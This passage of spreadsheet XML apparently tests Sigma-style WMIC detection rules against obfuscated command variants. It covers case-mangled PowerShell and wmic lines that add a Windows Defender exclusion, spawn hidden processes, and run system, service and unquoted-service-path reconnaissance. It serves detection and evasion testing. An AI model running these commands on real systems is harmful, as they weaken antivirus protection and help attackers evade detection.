      <c r="G148" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H148" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I148" s="44" t="n"/>
      <c r="J148" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K148" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="43" t="n"/>
      <c r="B149" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C149" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D149" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E149" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I149" s="43" t="n"/>
      <c r="J149" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K149" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="43" t="n"/>
      <c r="B150" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C150" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D150" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E150" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F150" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G150" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H150" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I150" s="43" t="n"/>
      <c r="J150" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K150" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="43" t="n"/>
      <c r="B151" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_process_creation</t>
        </is>
      </c>
      <c r="C151" s="44" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D151" s="44" t="inlineStr">
        <is>
          <t>526be59f-a573-4eea-b5f7-f0973207634d</t>
        </is>
      </c>
      <c r="E151" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -"WindowStyle" Hidden -c "[wmiclass]'Win32_Process'.Create('calc.exe')"</t>
        </is>
      </c>
      <c r="F151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I151" s="43" t="n"/>
      <c r="J151" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K151" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="43" t="n"/>
      <c r="B152" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_process_creation</t>
        </is>
      </c>
      <c r="C152" s="44" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D152" s="44" t="inlineStr">
        <is>
          <t>526be59f-a573-4eea-b5f7-f0973207634d</t>
        </is>
      </c>
      <c r="E152" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -wiNDoWStyle Hidden -coMmand "[wmiclass]'Win32_Process'.Create('calc.exe')"</t>
        </is>
      </c>
      <c r="F152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="43" t="n"/>
      <c r="J152" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K152" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="43" t="n"/>
      <c r="B153" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_process_creation</t>
        </is>
      </c>
      <c r="C153" s="44" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D153" s="44" t="inlineStr">
        <is>
          <t>526be59f-a573-4eea-b5f7-f0973207634d</t>
        </is>
      </c>
      <c r="E153" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -WinDOwsTYle Hidden -comMAnD "[wmiclass]'Win32_Process'.Create('calc.exe')"</t>
        </is>
      </c>
      <c r="F153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I153" s="43" t="n"/>
      <c r="J153" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K153" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="43" t="n"/>
      <c r="B154" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_process_creation</t>
        </is>
      </c>
      <c r="C154" s="44" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D154" s="44" t="inlineStr">
        <is>
          <t>526be59f-a573-4eea-b5f7-f0973207634d</t>
        </is>
      </c>
      <c r="E154" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -"WindowStyle" Hidden -"Command" "[wmiclass]'Win32_Process'.Create('calc.exe')"</t>
        </is>
      </c>
      <c r="F154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I154" s="43" t="n"/>
      <c r="J154" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K154" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="43" t="n"/>
      <c r="B155" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C155" s="44" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D155" s="44" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E155" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -wINDOwSTYle Hidden /"Command" "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I155" s="43" t="n"/>
      <c r="J155" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K155" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="43" t="n"/>
      <c r="B156" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C156" s="44" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D156" s="44" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E156" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -wiNdOwsTyLe Hidden /"Command" "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I156" s="43" t="n"/>
      <c r="J156" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K156" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1" s="42">
      <c r="A157" s="43" t="n"/>
      <c r="B157" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C157" s="44" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D157" s="44" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E157" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -"WindowStyle" Hidden -c "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I157" s="43" t="n"/>
      <c r="J157" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K157" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1" s="42">
      <c r="A158" s="43" t="n"/>
      <c r="B158" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C158" s="44" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D158" s="44" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E158" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" /"WindowStyle" Hidden -COMManD "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I158" s="43" t="n"/>
      <c r="J158" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K158" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="43" t="n"/>
      <c r="B159" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C159" s="44" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D159" s="44" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E159" s="44" t="inlineStr">
        <is>
          <t>powershell /"NoProfile" -coMmAnd "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I159" s="43" t="n"/>
      <c r="J159" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K159" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1" s="42">
      <c r="A160" s="43" t="n"/>
      <c r="B160" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C160" s="44" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D160" s="44" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E160" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -"Command" "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F160" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G160" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H160" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I160" s="43" t="n"/>
      <c r="J160" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K160" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1" s="42">
      <c r="A161" s="43" t="n"/>
      <c r="B161" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C161" s="44" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D161" s="44" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E161" s="44" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" /"Command" "(Get-CimInstance Win32_ComputerSystem).Model"</t>
        </is>
      </c>
      <c r="F161" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G161" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H161" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I161" s="43" t="n"/>
      <c r="J161" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K161" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1" s="42">
      <c r="A162" s="43" t="n"/>
      <c r="B162" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_csproduct</t>
        </is>
      </c>
      <c r="C162" s="44" t="inlineStr">
        <is>
          <t>Hardware Model Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D162" s="44" t="inlineStr">
        <is>
          <t>3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d</t>
        </is>
      </c>
      <c r="E162" s="44" t="inlineStr">
        <is>
          <t>wmic computersystem get model</t>
        </is>
      </c>
      <c r="F162" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G162" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H162" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I162" s="43" t="n"/>
      <c r="J162" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K162" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1" s="42">
      <c r="A163" s="43" t="n"/>
      <c r="B163" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_hotfix</t>
        </is>
      </c>
      <c r="C163" s="44" t="inlineStr">
        <is>
          <t>Windows Hotfix Updates Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D163" s="44" t="inlineStr">
        <is>
          <t>dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45</t>
        </is>
      </c>
      <c r="E163" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-HotFix"</t>
        </is>
      </c>
      <c r="F163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I163" s="43" t="n"/>
      <c r="J163" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K163" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1" s="42">
      <c r="A164" s="43" t="n"/>
      <c r="B164" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_process</t>
        </is>
      </c>
      <c r="C164" s="44" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D164" s="44" t="inlineStr">
        <is>
          <t>221b251a-357a-49a9-920a-271802777cc0</t>
        </is>
      </c>
      <c r="E164" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "notepad.exe"</t>
        </is>
      </c>
      <c r="F164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I164" s="43" t="n"/>
      <c r="J164" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K164" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1" s="42">
      <c r="A165" s="43" t="n"/>
      <c r="B165" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C165" s="44" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D165" s="44" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E165" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /Namespace:\root\CIMV2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F165" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G165" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H165" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I165" s="43" t="n"/>
      <c r="J165" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K165" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1" s="42">
      <c r="A166" s="43" t="n"/>
      <c r="B166" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C166" s="44" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D166" s="44" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E166" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /nAmEspACe:\rooT\CImv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F166" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G166" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H166" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I166" s="43" t="n"/>
      <c r="J166" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K166" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1" s="42">
      <c r="A167" s="43" t="n"/>
      <c r="B167" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C167" s="44" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D167" s="44" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E167" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /nAmesPace:\RooT\CImV2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F167" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G167" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H167" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I167" s="43" t="n"/>
      <c r="J167" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K167" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1" s="42">
      <c r="A168" s="43" t="n"/>
      <c r="B168" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C168" s="44" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D168" s="44" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E168" s="44" t="inlineStr">
        <is>
          <t>wmic.exe -"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H168" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I168" s="43" t="n"/>
      <c r="J168" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K168" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1" s="42">
      <c r="A169" s="43" t="n"/>
      <c r="B169" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C169" s="44" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D169" s="44" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E169" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -c "Get-WmiObject -Class Win32_Service -Filter \" Name='spooler'\""</t>
        </is>
      </c>
      <c r="F169" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G169" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H169" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I169" s="43" t="n"/>
      <c r="J169" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K169" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1" s="42">
      <c r="A170" s="43" t="n"/>
      <c r="B170" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C170" s="44" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D170" s="44" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E170" s="44" t="inlineStr">
        <is>
          <t>powershell -NoPROfIle -c "Get-WmiObject -Class Win32_Service -Filter \" Name='spooler'\""</t>
        </is>
      </c>
      <c r="F170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H170" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I170" s="43" t="n"/>
      <c r="J170" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K170" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1" s="42">
      <c r="A171" s="43" t="n"/>
      <c r="B171" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C171" s="44" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D171" s="44" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E171" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -"Command" "Get-WmiObject -Class Win32_Service -Filter \" Name='spooler'\""</t>
        </is>
      </c>
      <c r="F171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H171" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I171" s="43" t="n"/>
      <c r="J171" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K171" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1" s="42">
      <c r="A172" s="43" t="n"/>
      <c r="B172" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C172" s="44" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D172" s="44" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E172" s="44" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" /"Command" "Get-WmiObject -Class Win32_Service -Filter \" Name='spooler'\""</t>
        </is>
      </c>
      <c r="F172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H172" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I172" s="43" t="n"/>
      <c r="J172" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K172" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1" s="42">
      <c r="A173" s="43" t="n"/>
      <c r="B173" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_service</t>
        </is>
      </c>
      <c r="C173" s="44" t="inlineStr">
        <is>
          <t>Service Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D173" s="44" t="inlineStr">
        <is>
          <t>76f55eaa-d27f-4213-9d45-7b0e4b60bbae</t>
        </is>
      </c>
      <c r="E173" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -cOMMaNd "Get-WmiObject -Class Win32_Service -Filter \" Name='spooler'\""</t>
        </is>
      </c>
      <c r="F173" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G173" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H173" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I173" s="43" t="n"/>
      <c r="J173" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K173" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1" s="42">
      <c r="A174" s="43" t="n"/>
      <c r="B174" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C174" s="44" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D174" s="44" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E174" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /node:"localhost" /namespace:\\root\\cimv2 path Win32_Service get Name,DisplayName,PathName,StartMode /format:csv</t>
        </is>
      </c>
      <c r="F174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H174" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I174" s="43" t="n"/>
      <c r="J174" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K174" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1" s="42">
      <c r="A175" s="43" t="n"/>
      <c r="B175" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C175" s="44" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D175" s="44" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E175" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /node:"localhost" /namespace:\\root\\cimv2 path Win32_Service get Name,DisplayName,PathName,StartMode -"format:csv"</t>
        </is>
      </c>
      <c r="F175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H175" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I175" s="43" t="n"/>
      <c r="J175" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K175" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1" s="42">
      <c r="A176" s="43" t="n"/>
      <c r="B176" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C176" s="44" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D176" s="44" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E176" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /NoDe:"locaLhOst" /namEspAcE:\\Root\\ciMV2 path Win32_Service get Name,DisplayName,PathName,StartMode -"format:csv"</t>
        </is>
      </c>
      <c r="F176" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G176" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H176" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I176" s="43" t="n"/>
      <c r="J176" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K176" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1" s="42">
      <c r="A177" s="43" t="n"/>
      <c r="B177" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C177" s="44" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D177" s="44" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E177" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /node:"localhost" -"namespace:\\root\\cimv2" path Win32_Service get Name,DisplayName,PathName,StartMode /"format:csv"</t>
        </is>
      </c>
